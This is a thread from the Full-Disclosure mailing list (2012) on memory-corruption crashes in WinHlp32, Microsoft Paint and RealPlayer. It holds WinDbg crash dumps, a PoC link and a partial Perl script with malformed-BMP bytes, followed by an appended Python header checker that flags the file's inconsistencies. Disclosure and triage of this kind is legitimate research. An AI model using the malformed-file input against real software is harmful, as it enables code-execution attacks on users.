> The normal way of doing security research business (for normal people, of course) is to inform the vendor and discuss the issue. I would not describe further steps as they are well known. Kaveh Ghaemmaghami aka (coolkaveh) is either driven by his/her ego or never read this list's posts. Or both.
>
> Mikhail Utin, CISSP
>
> -----Original Message-----
> Today's Topics:
>
> 1. Microsoft Windows Help program (WinHlp32.exe) memory corruption (kaveh ghaemmaghami)
> 2. Microsoft Paint 5.1 memory corruption (kaveh ghaemmaghami)
>
> Hello list!
> I want to warn you about Microsoft Windows Help program (WinHlp32.exe) memory corruption
> Best Regards
> Kaveh Ghaemmaghami aka (coolkaveh)
Re: [Full-disclosure] Full-Disclosure Digest, Vol 92, Issue 34 - 1. Microsoft Windows Help program (WinHlp32.exe) memory
Or do, and grab a bag of popcorn ;)

On Tue, Oct 30, 2012 at 4:29 PM, Peter Dawson slash...@gmail.com wrote:
> Don't feed the trolls!
>
> On Tue, Oct 30, 2012 at 11:21 AM, Mikhail A. Utin mu...@commonwealthcare.org wrote:
> > The normal way of doing security research business (for normal people, of course) is to inform the vendor and discuss the issue. I would not describe further steps as they are well known. Kaveh Ghaemmaghami aka (coolkaveh) is either driven by his/her ego or never read this list's posts. Or both.
> >
> > Mikhail Utin, CISSP
> >
> > -----Original Message-----
> > Today's Topics:
> >
> > 1. Microsoft Windows Help program (WinHlp32.exe) memory corruption (kaveh ghaemmaghami)
> > 2. Microsoft Paint 5.1 memory corruption (kaveh ghaemmaghami)
> >
> > Hello list!
> > I want to warn you about Microsoft Windows Help program (WinHlp32.exe) memory corruption
> > Best Regards
> > Kaveh Ghaemmaghami aka (coolkaveh)

--
“There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] Microsoft Windows Help program (WinHlp32.exe) memory corruption
> I was looking, and it appears that this bug was fixed a long time ago at MS,

No, the bugs remain. However...

> also Windows Help (.hlp) files do not appear to be automatically opened in Windows Vista and later.

That's the point - hlp is such an unsafe file format that winhlp32.exe was *removed* from Vista.
Re: [Full-disclosure] Microsoft Paint 5.1 memory corruption
> Antony, if you want to do my homework, I suggest you find the offset that causes the crash, change some bytes and play with it; come back when there is no second chance, the instruction is not valid and it references invalid data. Instead of spamming.

Irrespective of the cause of the invalid access, the exception is *handled* by Paint. There is no crash.
Re: [Full-disclosure] RealPlayer 15.0.6.14(.3g2) WriteAV Vulnerability
Antony, go do your homework.

On Tue, Oct 30, 2012 at 1:07 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote:
> Hello List,
> I want to warn you about RealPlayer 15.0.6.14 memory corruption during the handling of .3g2 files.
> Look what awesome coolkaveh found. Let's kill that bug.
> Be safe, keep it priv8.
>
> Title: RealPlayer 15.0.6.14(.3g2) WriteAV Vulnerability
> Version : 15.0.6.14
> Date : 2012-10-29
> Vendor : http://www.real.com/
> crash: http://img543.imageshack.us/img543/9130/pocm.jpg
> Impact : High
> Contact : coolkaveh [at] rocketmail.com
> Twitter : @coolkaveh
> tested : windows 7 x64
> Author : coolkaveh
> ###
> Bug :
> Memory corruption during the handling of 3g2 files; context-dependent. Successful exploits can allow attackers to execute arbitrary code.
>
> (f84.8c8): Access violation - code c005 (first chance)
> First chance exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax=040d1370 ebx=7fdfe2d0 ecx=0a67f798 edx=0a67f7a8 esi= edi=0004
> eip=66fc94df esp=3c6c1a80 ebp=0a67f764 iopl=0 nv up ei pl nz na po nc
> cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
> *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Real\RealPlayer\codecs\dmp4.dll -
> dmp4!GetGUID+0x1836f:
> 66fc94df 8944241c        mov     dword ptr [esp+1Ch],eax ss:002b:3c6c1a9c=
> 0:029> !exploitable -v
> HostMachine\HostUser
> Executing Processor Architecture is x86
> Debuggee is in User Mode
> Debuggee is a live user mode debugging session on the local machine
> Event Type: Exception
> Exception Faulting Address: 0x3c6c1a9c
> First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC005)
> Exception Sub-Type: Write Access Violation
> Exception Hash (Major/Minor): 0x247c7f22.0x247c7f63
> Stack Trace:
> dmp4!GetGUID+0x1836f
> Instruction Address: 0x66fc94df
> Description: User Mode Write AV
> Short Description: WriteAV
> Exploitability Classification: EXPLOITABLE
> Recommended Bug Title: Exploitable - User Mode Write AV starting at dmp4!GetGUID+0x0001836f (Hash=0x247c7f22.0x247c7f63)
> User mode write access violations that are not near NULL are exploitable.
>
> Proof of concept included.
> http://www21.zippyshare.com/v/83302158/file.html
Re: [Full-disclosure] Microsoft Paint 5.1 memory corruption
Defective software is OK, leave it. I am just going to press g; if it is handled, it's OK. Not even changing some bytes and analyzing.

On Sat, Oct 27, 2012 at 3:14 PM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote:
> Hello list!
> I want to warn you about Microsoft Paint 5.1 memory corruption
> Be safe
> Kaveh Ghaemmaghami aka (coolkaveh)
> --
> #!/usr/bin/perl
> #Title: Microsoft Paint 5.1 memory corruption
> #Version : build 2600.xpsp Service Pack3
> #Date : 2012-10-21
> #Vendor : http://www.microsoft.com
> #Impact : Med/High
> #Contact : coolkaveh [at] rocketmail.com
> #Twitter : @coolkaveh
> #tested : XP SP3 ENG
> #Author : coolkaveh
> ###
> #Notice : for testing the POC please run Microsoft Paint under a debugger and then open the POC file.
> #
> #Bug :
> #
> #Memory corruption during the handling of bmp files; a context-dependent attacker can execute arbitrary code.
> ###
> #(844.cc4): Break instruction exception - code 8003 (first chance)
> #eax=7ffda000 ebx=0001 ecx=0002 edx=0003 esi=0004 edi=0005
> #eip=7c90120e esp=00faffcc ebp=00fafff4 iopl=0 nv up ei pl zr na pe nc
> #cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs= efl=0246
> #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
> #ntdll!DbgBreakPoint:
> #7c90120e cc              int     3
> #0:005> g
> #(844.e20): Access violation - code c005 (first chance)
> #First chance exceptions are reported before any exception handling.
> #This exception may be expected and handled.
> #eax=000cab68 ebx= ecx=0276 edx=09d8 esi=000d5589 edi=000cab68
> #eip=77f2f118 esp=0007ef30 ebp=0007efb0 iopl=0 nv up ei pl nz na po nc
> #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202
> #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\GDI32.dll -
> #GDI32!DdEntry11+0x44:
> #77f2f118 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
> #0:000> k
> #*** ERROR: Module load completed but symbols could not be loaded for C:\WINDOWS\system32\mspaint.exe
> #ChildEBP RetAddr
> #WARNING: Stack unwind information not available. Following frames may be wrong.
> #0007efb0 0101235e GDI32!DdEntry11+0x44
> #0007f024 0100a666 mspaint+0x1235e
> #0007f04c 0102284e mspaint+0xa666
> #0007f07c 01022af6 mspaint+0x2284e
> #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\MFC42u.DLL -
> #0007f100 5f801bc5 mspaint+0x22af6
> #0007f120 5f801b36 MFC42u!Ordinal6370+0x22
> #0007f180 5f802f6c MFC42u!Ordinal1108+0x91
> #0007f1a4 5f810971 MFC42u!Ordinal5801+0x34
> #0007f210 5f81424a MFC42u!Ordinal3944+0x5b
> #0007f2b0 7c911066 MFC42u!Ordinal5190+0x14d
> #0007f2b4 7c9101bb ntdll!wcsncpy+0xb07
> #0007f2c8 7c910202 ntdll!RtlAllocateHeap+0x117
> #0007f2f4 7c910202 ntdll!RtlAllocateHeap+0x15e
> #0007f2f8 7c91017b ntdll!RtlAllocateHeap+0x15e
> #0007f2fc 7c9101bb ntdll!RtlAllocateHeap+0xd7
> #0007f300 ntdll!RtlAllocateHeap+0x117
> #
> my $poc = "\x42\x4D\x4E\x0A\x00\x00\x00\x00\x00\x00\xC7\xBD\x00\x00\x28\x00\x00\x00\x46\x00\x00\x00\x46\x00\x00" .
> "\x00\x01\x00\x04\x00\x00\x00\x00\x00\xD8\x09\x00\x00\xC4\x0E\x00\x00\xC4\x0E\x00\x00\x00\x00\x00\x00" .
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80" .
> "\x00\x80\x00\x80\x80\x00\x00\x80\x80\x80\x00\xC0\xC0\xC0\x00\x00\x00\xFF\x00\x00\xFF\x00\x00\x00\xFF" .
> "\xFF\x00\xFF\x00\x00\x00\xFF\x00\xFF\x00\xFF\xFF\x00\x00\xFF\xFF\xFF\x00\x88\x88\x88\x88\x88\x88\x88" .
> "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x88\x87\x78\x88\x88\x88\x88\x87\x88\x88\x88\x88\x88" .
> "\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\x88\x88\x88\x88\x88\xFF\x87\x70\x77\x71" .
> "\x77\x77\x77\x77\x77\x72\x78\x88\x77\x07\x88\x77\x77\x78\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF" .
> "\xFF\xFF\xFF\xFF\x88\x8F\xF8\xFF\xFF\x7F\xFF\xF7\x8F\x07\xF7\x8F\xF8\x07\x88\xFF\xF0\x78\xFF\x87\x77" .
> "\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\x88\xFF\x88\x8F\xFF\xFF\x8F\xF8\x87\x8F\x7F" .
> "\xF7\xFF\x8F\x80\x8F\xFF\xF7\x8F\xF8\xFF\x07\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xF8" .
> "\x8F\xF8\x88\x8F\xFF\x77\x8F\xF8\x84\x8F\xFF\xF7\xFF\x08\xF7\xFF\x7F\xF7\xFF\x47\x8F\x76\x00\x88\x88" .
> "\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xF8\x8F\x88\x88\x8F\xFF\x77\x8F\xFF\xF7\x8F\xFF\xF7\xFF\x08" .
> "\xF7\xF8\x0F\xF7\xF8\x07\x7F\x77\x00\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xF8\x88\x88" .
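As an added example (not part of the thread or of the author's PoC), a BMP header consistency check run over the first 54 bytes of the PoC quoted above; the header bytes are copied from that PoC, while the checks and the dimension limits are my own assumptions about what a well-formed file looks like. It reports that the posted file declares bfOffBits 0xBDC7, a pixel-data offset that lies past its own declared bfSize of 0xA4E.

```python
import struct

# Constructed from the first 54 bytes of the BMP PoC quoted in the thread
# (BITMAPFILEHEADER + BITMAPINFOHEADER); the palette and pixel rows are not needed here.
POC_HEADER = bytes.fromhex(
    "424D" "4E0A0000" "0000" "0000" "C7BD0000"         # 'BM', bfSize=0xA4E, reserved, bfOffBits=0xBDC7
    "28000000" "46000000" "46000000" "0100" "0400"     # biSize=40, 70 x 70, 1 plane, 4 bpp
    "00000000" "D8090000" "C40E0000" "C40E0000"        # BI_RGB, biSizeImage=0x9D8, 3780 ppm x/y
    "00000000" "00000000"                              # biClrUsed=0 (all 16 entries), biClrImportant=0
)
FILE_HDR = struct.Struct("<2sIHHI")        # bfType, bfSize, bfReserved1, bfReserved2, bfOffBits
INFO_HDR = struct.Struct("<IiiHHIIiiII")   # the eleven BITMAPINFOHEADER fields, 40 bytes
VALID_BPP = (1, 4, 8, 16, 24, 32)

def parse_bmp_header(data):
    """Decode the two fixed headers into a dict (raises ValueError when truncated)."""
    if len(data) < FILE_HDR.size + INFO_HDR.size:
        raise ValueError("truncated BMP header")
    magic, size, _, _, off = FILE_HDR.unpack_from(data, 0)
    hdr, w, h, planes, bpp, comp, img, _, _, clr, _ = INFO_HDR.unpack_from(data, FILE_HDR.size)
    return dict(magic=magic, file_size=size, off_bits=off, hdr_size=hdr, width=w, height=h,
                planes=planes, bpp=bpp, compression=comp, size_image=img, clr_used=clr)

def check_bmp_header(data, actual_len=None):
    """Return a list of inconsistencies between the declared fields; [] means consistent."""
    h = parse_bmp_header(data)
    flen = h["file_size"] if actual_len is None else actual_len   # trust bfSize only if no real length
    out = []
    if h["magic"] != b"BM":
        out.append("bad magic %r" % h["magic"])
    if h["hdr_size"] != INFO_HDR.size:
        return out + ["unsupported DIB header size %d" % h["hdr_size"]]
    if h["bpp"] not in VALID_BPP or h["planes"] != 1:
        return out + ["bad bpp/planes %d/%d" % (h["bpp"], h["planes"])]
    if not 0 < h["width"] <= 1 << 15 or not 0 < abs(h["height"]) <= 1 << 15:
        return out + ["unreasonable dimensions %dx%d" % (h["width"], h["height"])]
    palette = 4 * (h["clr_used"] or 1 << h["bpp"]) if h["bpp"] <= 8 else 0   # indexed: 4-byte entries
    stride = ((h["width"] * h["bpp"] + 31) // 32) * 4   # every row is padded to a 4-byte boundary
    pixels = stride * abs(h["height"])
    min_off = FILE_HDR.size + INFO_HDR.size + palette
    if h["off_bits"] < min_off:
        out.append("bfOffBits 0x%X overlaps the headers/palette (min 0x%X)" % (h["off_bits"], min_off))
    if h["off_bits"] > flen:
        out.append("bfOffBits 0x%X lies beyond the file size 0x%X" % (h["off_bits"], flen))
    elif h["compression"] == 0 and h["off_bits"] + pixels > flen:
        out.append("pixel data (%d bytes) runs past end of file" % pixels)
    if h["compression"] == 0 and h["size_image"] not in (0, pixels):
        out.append("biSizeImage %d != computed %d" % (h["size_image"], pixels))
    return out
```

For triage it is worth noting that the crashing rep movs in the quoted dump ran with ecx=0x276 dwords, i.e. 0x9D8 bytes, the same value the header declares in biSizeImage; the check above does not depend on that observation.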